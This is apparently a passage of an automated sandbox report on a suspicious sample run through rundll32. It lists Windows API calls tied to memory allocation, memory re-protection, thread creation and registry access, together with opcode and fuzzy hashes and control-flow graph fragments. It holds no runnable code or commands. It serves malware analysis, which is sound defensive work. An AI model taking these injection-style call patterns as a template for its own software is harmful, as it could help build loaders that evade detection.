      • API String ID: 71445658-0
      • Opcode ID: 95a671d22d9d17886cef8a2570fbb0e706f7ed5a7d9b86641912563606fbeb3a
      • Instruction ID: bb974cd0536de74ddc7facd1a3ca43675bf7eeb7c6d05ad606e794b629ded14a
      • Opcode Fuzzy Hash: 95a671d22d9d17886cef8a2570fbb0e706f7ed5a7d9b86641912563606fbeb3a
      • Instruction Fuzzy Hash: 80A1A7369086618FD724CF28C88465AF7E2BFC8310F16856DE999AB364DB30EC05CF81
      APIs
      • RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 0660C871
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: QueryValue
      • String ID:
      • API String ID: 3660427363-0
      • Opcode ID: ec3b9969ba55457a074e4eab2ca4f63715ad237c09db28f2183b276895f1652a
      • Instruction ID: 006c378340133d4893d70c38cd7257825114a491c8c6a3f059311f4172386199
      • Opcode Fuzzy Hash: ec3b9969ba55457a074e4eab2ca4f63715ad237c09db28f2183b276895f1652a
      • Instruction Fuzzy Hash: FFA19F36A147408FD724CF28C880A6AB7E2FFC8310F568A2DE5959B364D731F906CB91
      APIs
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 06602400
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: ProtectVirtual
      • String ID:
      • API String ID: 544645111-0
      • Opcode ID: 15dc6c12d7e979e55322446972bdc9c8f4fab10e9133e25eb21e3efb49250773
      • Instruction ID: 464bfd2fe0470c0b8e2a0ebce680cfb7ee69575a56a2468fa86b426e8b7e71ff
      • Opcode Fuzzy Hash: 15dc6c12d7e979e55322446972bdc9c8f4fab10e9133e25eb21e3efb49250773
      • Instruction Fuzzy Hash: 3C915876E001189FDB14CFA9C84499EB7B7BF88314F6A816AD415BB345DB31AE46CF80
      APIs
      • NtQueryDirectoryObject.NTDLL(?,?,?,?,?,?,?), ref: 066068F2
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: DirectoryObjectQuery
      • String ID:
      • API String ID: 1728361593-0
      • Opcode ID: da242fc9d4a44a311d8fa9c5f1d9b687644c76716baaec1ee4a56792fd08f05b
      • Instruction ID: d7bf5679a6ca3757a3cba02285da7aa01c5a8b0c079e7725f2887ea4daa6c8c8
      • Opcode Fuzzy Hash: da242fc9d4a44a311d8fa9c5f1d9b687644c76716baaec1ee4a56792fd08f05b
      • Instruction Fuzzy Hash: F4819F36A086518FE314CF29C84066BF7E3BBC8314F198A2DE9959B354DB71E816CB91
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CloseFind
      • String ID:
      • API String ID: 1863332320-0
      • Opcode ID: 6d84ef1a72197c6040c77c5ed7aa744900656241686a233e61a2e97a9b76c94d
      • Instruction ID: a972dc2a46451d1104ca3502e84a3124782be4abadc17d6038e12fb1c89ba30d
      • Opcode Fuzzy Hash: 6d84ef1a72197c6040c77c5ed7aa744900656241686a233e61a2e97a9b76c94d
      • Instruction Fuzzy Hash: 03913D76E00619CFDB14CFA9C84059EFBB2BF88310F268269D415BB395D730A946CF90

      Control-flow Graph

      control_flow_graph 365 4e5a660-4e5a6d9 366 4e5a6df-4e5a702 365->366 367 4e5a704-4e5a716 366->367 368 4e5a6db-4e5a6dc 366->368 369 4e5a812-4e5a825 367->369 370 4e5a71c-4e5a747 367->370 368->366 371 4e5a74b-4e5a755 370->371 372 4e5a757-4e5a7a1 VirtualAllocExNuma 371->372 373 4e5a7a3-4e5a7ad 371->373 374 4e5a806-4e5a80c 372->374 375 4e5a7b5-4e5a7bf 373->375 376 4e5a7af-4e5a7b3 373->376 374->369 374->371 377 4e5a7c1-4e5a7cb 375->377 378 4e5a828-4e5a8f7 375->378 376->374 379 4e5a7e3-4e5a7ed 377->379 380 4e5a7cd-4e5a7e1 377->380 378->374 379->374 382 4e5a7ef-4e5a802 379->382 380->374 382->374
      APIs
      • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?), ref: 04E5A78C
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: AllocNumaVirtual
      • String ID:
      • API String ID: 4233825816-0
      • Opcode ID: bccee90482f3d822cd727697cb4d73832f475eaca5f31ed4075cd0be46bb443e
      • Instruction ID: a23071248f0d9bae1e24eebb91398c000d68fe8b89ed2cd84b94dc133ae583c1
      • Opcode Fuzzy Hash: bccee90482f3d822cd727697cb4d73832f475eaca5f31ed4075cd0be46bb443e
      • Instruction Fuzzy Hash: 1F71A0766182508FC718CF29D89466BB7E2FFC8314F158A2DE599C7360EB75E805CB81

      Control-flow Graph

      control_flow_graph 384 4e5a900-4e5a99d 385 4e5a99f-4e5a9b8 384->385 386 4e5a9ba-4e5a9cf 384->386 385->385 385->386 387 4e5a9d5-4e5a9ef 386->387 388 4e5aabe-4e5aad1 386->388 389 4e5a9f5-4e5a9ff 387->389 390 4e5aa05-4e5aa0f 389->390 391 4e5aa9f-4e5aab3 389->391 393 4e5aa15-4e5aa1e 390->393 394 4e5aa96-4e5aa9d 390->394 392 4e5aab6-4e5aab8 391->392 392->388 392->389 395 4e5aa20-4e5aa2a 393->395 396 4e5aa82-4e5aa94 393->396 394->392 397 4e5aa74-4e5aa7e 395->397 398 4e5aa2c-4e5aa72 VirtualProtect 395->398 396->392 399 4e5aa80 397->399 400 4e5aad2-4e5aba2 397->400 398->392 399->392 400->392
      APIs
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04E5AA5A
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: ProtectVirtual
      • String ID:
      • API String ID: 544645111-0
      • Opcode ID: 15deada0825a71de3faa2d20ecbbbd8e5715a366ba8638a8c3e85bbc2090ba35
      • Instruction ID: b14975ea5ce77008eaf8a613c75ed64b3ab5f172088da22aa18ee235472ed054
      • Opcode Fuzzy Hash: 15deada0825a71de3faa2d20ecbbbd8e5715a366ba8638a8c3e85bbc2090ba35
      • Instruction Fuzzy Hash: 17718D766082518FC724CF29D88055BB7E2FFC8318F568A2DE8C997355EB30B906CB91
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Close
      • String ID:
      • API String ID: 3535843008-0
      • Opcode ID: 5f8eaf98f79afd25ee21306e2592d579547c6d0ef75424336021dc7cdc2867bd
      • Instruction ID: 4d0d651df6d2e7be7a2910b3936b1aa097fc64bb8fc14bae68274a889bfb9e51
      • Opcode Fuzzy Hash: 5f8eaf98f79afd25ee21306e2592d579547c6d0ef75424336021dc7cdc2867bd
      • Instruction Fuzzy Hash: EB5193326087409FD748CE25D89092FB7E3BFC8320F55C62DE19587798DA74D815CB92
      APIs
      • DeviceIoControl.KERNEL32(?,?,?,?,?,?,?,?), ref: 065FD5E0
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: ControlDevice
      • String ID:
      • API String ID: 2352790924-0
      • Opcode ID: cc6f7223156317bb9874930efb9f67c545585e8fc5d49bad08b4f96be9167bc4
      • Instruction ID: 9dbfec6bd004177fc899a02cc68fe273fedd8bf516a8d612f73ba3b94de13122
      • Opcode Fuzzy Hash: cc6f7223156317bb9874930efb9f67c545585e8fc5d49bad08b4f96be9167bc4
      • Instruction Fuzzy Hash: 4A5191326182418FC314CF28C880AAAB7F3FFD9314F558A1DE69987654DB35E816CF52

      Control-flow Graph

      control_flow_graph 403 4e52084-4e52085 404 4e52104-4e5210c 403->404 405 4e52087-4e520f4 NtCreateThreadEx 403->405 407 4e52160 404->407 408 4e5210e-4e52116 404->408 406 4e520f6-4e520ff 405->406 410 4e5205c-4e5205e 406->410 409 4e52163-4e52167 407->409 411 4e52142-4e5215b 408->411 412 4e52118-4e52120 408->412 409->410 413 4e52077-4e5207f 410->413 414 4e52060-4e52072 410->414 411->410 415 4e52122-4e5212a 412->415 416 4e5216c-4e521ca 412->416 413->403 414->409 415->410 417 4e52130-4e5213f 415->417 419 4e521d4-4e521fe 416->419 419->419 420 4e52200-4e52299 419->420 420->406
      APIs
      • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04E520D8
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: 24ceb956e5bf62a7e138cf5b350d4aab77c8ff36057b925526ea7e3f0d51165c
      • Instruction ID: 4cf9b99c17d89bd3d045f77139862a0979e19118c9741bee5c7d77503b481412
      • Opcode Fuzzy Hash: 24ceb956e5bf62a7e138cf5b350d4aab77c8ff36057b925526ea7e3f0d51165c
      • Instruction Fuzzy Hash: D9612972A11129DFCB14CFA8DD416DEBBB2BF88314F168195D649BB210DB30AD85CF90
      APIs
      • RegEnumKeyExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0660A600
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Enum
      • String ID:
      • API String ID: 2928410991-0
      • Opcode ID: f990396587949cb153fedb5fe14909deda8134a0efc39bac05524446b0b68357
      • Instruction ID: 7c24b77a4f34e3806eac21678f32073fddfe476779458a316ec7b327712bc864
      • Opcode Fuzzy Hash: f990396587949cb153fedb5fe14909deda8134a0efc39bac05524446b0b68357
      • Instruction Fuzzy Hash: 97514B76E102198FDB54CFA9C940AAEBBB2FF88310F268169D519BB345D730A951CF90
      APIs
      • CreateThread.KERNEL32(?,?,?,?,?,?), ref: 06606CFA
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: 95f4ad5ca1adf209704b079f1363fcf34fd8d161a5df8f7f2972e5aaa3a69e16
      • Instruction ID: 0724b9e7f16dac1aa4e28b3dc0ab9f1ee179534cbe79f92a320c1e57ba75a8e3
      • Opcode Fuzzy Hash: 95f4ad5ca1adf209704b079f1363fcf34fd8d161a5df8f7f2972e5aaa3a69e16
      • Instruction Fuzzy Hash: 18512876E101199FDF54CFA8C841A9DBBB2FF88324F258169D519F7290DB30AD928F90
      APIs
      • FindFirstFileW.KERNEL32(?,?), ref: 06622A9E
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: FileFindFirst
      • String ID:
      • API String ID: 1974802433-0
      • Opcode ID: 4047ccd1df7b02ee649c0434a1f8863fff4c4e00dab1f88195392208fce2c719
      • Instruction ID: 801e5c9c87f5267a97baf3161e9647d3a1659f2dbd17fba3bdf64764a4ab246f
      • Opcode Fuzzy Hash: 4047ccd1df7b02ee649c0434a1f8863fff4c4e00dab1f88195392208fce2c719
      • Instruction Fuzzy Hash: A451A472918661CFC760CF28C48069AB7F2FF99314F19896DE5989B355D335B902CF82
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: a1f749d1228d12483d002b7ecf7afc12e468cc761eb6f660094fbeeb531b8d1a
      • Instruction ID: 176ac28767caa0934bec814811da78bc8e4b391b0abbd0cd087fd4ae22963b15
      • Opcode Fuzzy Hash: a1f749d1228d12483d002b7ecf7afc12e468cc761eb6f660094fbeeb531b8d1a
      • Instruction Fuzzy Hash: 6751F876E006188FDB58CFA9C94469EB7B6BF88210F268269D509BB355D730AD46CF80
      APIs
      • RtlExitUserThread.NTDLL(?), ref: 06602642
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: ExitThreadUser
      • String ID:
      • API String ID: 3424019298-0
      • Opcode ID: 0104faa69a9aac88046f498ef5555fdfa05ca6495ab1b725651d8e80769998d0
      • Instruction ID: 77fe6cdff05e4bb1195661e21c37a9992bf3f3b8dc3a128fab987eabdfc4bb0b
      • Opcode Fuzzy Hash: 0104faa69a9aac88046f498ef5555fdfa05ca6495ab1b725651d8e80769998d0
      • Instruction Fuzzy Hash: E9419132614A008FD368CF29D99491BB7F7BFD8320B158A2DE19687794DB34F816CB51
      APIs
      • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 06610248
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: f5ec28b149f4ac20a3ae90ec014871efbb31d72bb0b420416afe0af5a5cef663
      • Instruction ID: 63514e7e1c8926aa8796be268715f8d8614e3571cfa0edf27040596434edd635
      • Opcode Fuzzy Hash: f5ec28b149f4ac20a3ae90ec014871efbb31d72bb0b420416afe0af5a5cef663
      • Instruction Fuzzy Hash: A5519032A086419FD724CF28C990A5BB7E3BFC4310F198A1DE599DB254CB31E852CB82
      APIs
      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0660D9A0
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: InformationQuerySystem
      • String ID:
      • API String ID: 3562636166-0
      • Opcode ID: 2f20fae7ce6d9e12b1e2a07e5868e5cfcd395fec26baaf9ed1a853910ded2808
      • Instruction ID: 4fab520631015bdf6bfc47267445864f2a06fbe2b4e8e8e91bdc043ad2ae15f8
      • Opcode Fuzzy Hash: 2f20fae7ce6d9e12b1e2a07e5868e5cfcd395fec26baaf9ed1a853910ded2808
      • Instruction Fuzzy Hash: 45512E36E001188FDF58CFA8C8A1AADBBB2FF84314F558199D14AA7254DB31AD86CF50

      Control-flow Graph

      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 04D31DAA
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 60cfc3169bd1d2215ac6e5c1fecdd99cf854f9d635ccf10514420de4cfbc4a31
      • Instruction ID: 9e79365bc6bd4cb853f0f0115fef029e09489dbce37a07e4d0eaf91776e4d9dd
      • Opcode Fuzzy Hash: 60cfc3169bd1d2215ac6e5c1fecdd99cf854f9d635ccf10514420de4cfbc4a31
      • Instruction Fuzzy Hash: C8B1D5B6A053408FC728CF2AC8957EAF7E6BFC9310F15862E949ECB354DB7499058B41
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 065FD262
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: a8a022706bec59e03830368abbac0ca58c29d356b1ca839a9a0c4c7365de563f
      • Instruction ID: b2af2f3a65e5b423730ff8415b5cd4d7ebc2762c3f0a6bbec790d636adaea55d
      • Opcode Fuzzy Hash: a8a022706bec59e03830368abbac0ca58c29d356b1ca839a9a0c4c7365de563f
      • Instruction Fuzzy Hash: 5DA12A76D112188FDB10CFA9C84069DFBB2FF98324F26815AD519BB345DB30A946CF80
      APIs
      • VirtualFree.KERNELBASE(?,?,?), ref: 0660E56F
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: FreeVirtual
      • String ID:
      • API String ID: 1263568516-0
      • Opcode ID: efac9e74aeef8ad33caa4d1855e26423e6f7e2dffa471e780b2ac220ef82b84d
      • Instruction ID: 465fef8407c7aecfe3022d9a914d7dca80e00460163be5f462e3c2f526d4d4cc
      • Opcode Fuzzy Hash: efac9e74aeef8ad33caa4d1855e26423e6f7e2dffa471e780b2ac220ef82b84d
      • Instruction Fuzzy Hash: 19818F76A086518FD355CF29C84055BB7E3BBC8310F2A8D2DE591E7394EA35F816CB82
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CloseHandle
      • String ID:
      • API String ID: 2962429428-0
      • Opcode ID: df8df8c803b639d2c883c5aa05b52be0735d0f209ef62e9e78b202865974b7e5
      • Instruction ID: 5b0971187fa1a3e2ed3f3814d8162c10f549239faabd6260d21d64fde741ad79
      • Opcode Fuzzy Hash: df8df8c803b639d2c883c5aa05b52be0735d0f209ef62e9e78b202865974b7e5
      • Instruction Fuzzy Hash: D961AD3A6187518FE314CF29C88062BB7E3BBC8714F268A1DE5959B754DB31E806CF81

      Control-flow Graph

      control_flow_graph 443 4d31680-4d31cc2 445 4d31ce2-4d31cfd 443->445 446 4d31cc4 443->446 448 4d31d04-4d31d16 445->448 447 4d31cc6-4d31ce0 446->447 447->445 447->447 450 4d31d18-4d31d20 448->450 450->450 451 4d31d22-4d3236d call 4d347a8 VirtualAlloc call 4d347a8 * 3 450->451 451->448
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 04D31DAA
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 3844c2bc1c125151e3a65f5664f705e6c7d18e1e64113b91be581051fd88fbf1
      • Instruction ID: 6664d94f3f35fba7f851af383bfead0bcf2c88274676eee0257c4858f69cb6c2
      • Opcode Fuzzy Hash: 3844c2bc1c125151e3a65f5664f705e6c7d18e1e64113b91be581051fd88fbf1
      • Instruction Fuzzy Hash: 3761AFB5A143408FD314CF29C844BABBBE6FBC9310F118A6EA499CB394DB34D906CB51

      Control-flow Graph

      control_flow_graph 461 4e571d2-4e57215 VirtualFree 462 4e57218-4e57221 461->462 463 4e57176-4e57178 462->463 464 4e5718e-4e57196 463->464 465 4e5717a-4e5718c 463->465 466 4e57243-4e5725b 464->466 467 4e5719c-4e571aa 464->467 465->463 466->463 468 4e57231-4e57240 467->468 469 4e571b0-4e571b8 467->469 470 4e57260-4e57363 469->470 471 4e571be-4e571c6 469->471 470->462 472 4e57226-4e5722c 471->472 473 4e571c8-4e571d0 471->473 472->463 473->461 473->463
      APIs
      • VirtualFree.KERNELBASE(?,?,?), ref: 04E571EF
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: FreeVirtual
      • String ID:
      • API String ID: 1263568516-0
      • Opcode ID: afc1b4807ad34aa9e0bfe8a784944cf810ea806076dc0560b94a8b5171d245a1
      • Instruction ID: d55b204f2ef6e09ccd41f38f180b2ceb91b450766c22d4283ccdde9768bc4bed
      • Opcode Fuzzy Hash: afc1b4807ad34aa9e0bfe8a784944cf810ea806076dc0560b94a8b5171d245a1
      • Instruction Fuzzy Hash: 51511777E001198FCB14CFA8D9416DDB7B2FF98314F26819AD409B7210DB30BA928F90
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 348612c32f1e5d903fd507d82f62253d58ffb455e3bd38ccaa9baf1aea483aaa
      • Instruction ID: 90047cee4dafcdcfdf88567a37a720c6da70be554cf91e355141fec2e73bbc71
      • Opcode Fuzzy Hash: 348612c32f1e5d903fd507d82f62253d58ffb455e3bd38ccaa9baf1aea483aaa
      • Instruction Fuzzy Hash: 1652D537B546214BD72CCE7DCC912AAF6D3ABC8310F1AD63E9989D7358DE74AC058680
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 3fef0f4d7e9c3a6715cc1d5a02c7c9c282143ade2b966986f2c342b23fc0118a
      • Instruction ID: 623cc21546c2950354300ad73b1ae42cc8612f062e93ad1e39b27b732f7275db
      • Opcode Fuzzy Hash: 3fef0f4d7e9c3a6715cc1d5a02c7c9c282143ade2b966986f2c342b23fc0118a
      • Instruction Fuzzy Hash: 7C827E716187928FC775CF28C884BEAB7E1BFD5310F148A2DD4999B390DB34A945CB82
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6a2226ea47b2e38efbfc39fbaea6305956f2a56e00cf0c6b883367e156a63ffa
      • Instruction ID: c7a80fdb620d40656cb66ca9457ffabb61c86f7aeb0590fe1515ac5830559349
      • Opcode Fuzzy Hash: 6a2226ea47b2e38efbfc39fbaea6305956f2a56e00cf0c6b883367e156a63ffa
      • Instruction Fuzzy Hash: 5B72C1716183828FC769CF28C995BAAFBE9FFC4214F144A2DE199C7390E734A605CB51
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 534250bcc6a86e9feccb8767a7f266c576d948b87e11db586026b5d8fac135a5
      • Instruction ID: ef03d9f62793d64f5d043d107b37d0dba3c63edfc17b93b29edf9148c6590fe3
      • Opcode Fuzzy Hash: 534250bcc6a86e9feccb8767a7f266c576d948b87e11db586026b5d8fac135a5
      • Instruction Fuzzy Hash: 41627A72A096918FE374CF29C580AABB7E2BFC5314F15CA5DC4895B359DB346806CF82
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:

      Control-flow Graph

      APIs
      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00009088), ref: 27AC18D7
      • WaitForSingleObject.KERNEL32(00000000), ref: 27AC18DE
        • Part of subcall function 27AC1120: GetTickCount.KERNEL32 ref: 27AC116C
        • Part of subcall function 27AC1120: SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
        • Part of subcall function 27AC1120: SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
        • Part of subcall function 27AC1120: UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
        • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC122C
        • Part of subcall function 27AC1120: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
        • Part of subcall function 27AC1120: GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
        • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC128C
      • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 27AC18EC
      Memory Dump Source
      • Source File: 00000003.00000002.22961902767.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
      Similarity
      • API ID: CreateValuesprintf$AllocComputeCountCrc32EventGlobalObjectProcessSequentialSingleTerminateTickUuidWait
      • String ID:
      • API String ID: 3103566969-0
      • Opcode ID: 8dabf4b52cb4f457aca4ebc0624c47dc4196281b91c428161e50fb08894ee4ce
      • Instruction ID: 63fbabbbf26330366ed9b718a62b1419555281b4622388cdf8ef43b824dd0547
      • Opcode Fuzzy Hash: 8dabf4b52cb4f457aca4ebc0624c47dc4196281b91c428161e50fb08894ee4ce
      • Instruction Fuzzy Hash: FAD0C9729021307A916226628C1DCCB2E1CEF2ABB1310031BB529400D0CA2C4882C5F5

      Control-flow Graph

      control_flow_graph 343 30e1eb1-30e1f0d VirtualProtect 344 30e2067-30e208f 343->344 345 30e1fcb-30e2034 call 30e14a3 344->345 346 30e2095 344->346 345->344
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.22960009314.00000000030E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_30e0000_rundll32.jbxd
      Similarity
      • API ID: ProtectVirtual
      • String ID: X
      • API String ID: 544645111-3081909835
      • Opcode ID: d2a3a0994755566863b41518f0ba61358616c682e99c523238f9e6b8a90c07c6
      • Instruction ID: 03f50ab0ed465b842811ad92f4cbe926329b94b154d59a766ab61ddeebc71df8
      • Opcode Fuzzy Hash: d2a3a0994755566863b41518f0ba61358616c682e99c523238f9e6b8a90c07c6
      • Instruction Fuzzy Hash: 3431DEB5E006288FCB48CF58C880A9DFBF1FF48310F5981AAC909A7752D731A991CF90

      Control-flow Graph

      control_flow_graph 442 27ac18f6-27ac1908 CreateThread
      APIs
      • CreateThread.KERNEL32(00000000,00000000,Function_000008CB,00000000,00000000,00000000), ref: 27AC1902
      Memory Dump Source
      • Source File: 00000003.00000002.22961902767.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: f6c7bea3175cfc294230f47d58ba1dfccdcd670ef459563e0909d5e87e22ef4b
      • Instruction ID: 172ebd3abfcba25a4b18c4b3e631a9a31cace7394975a7142e15f80cdbddfbe7
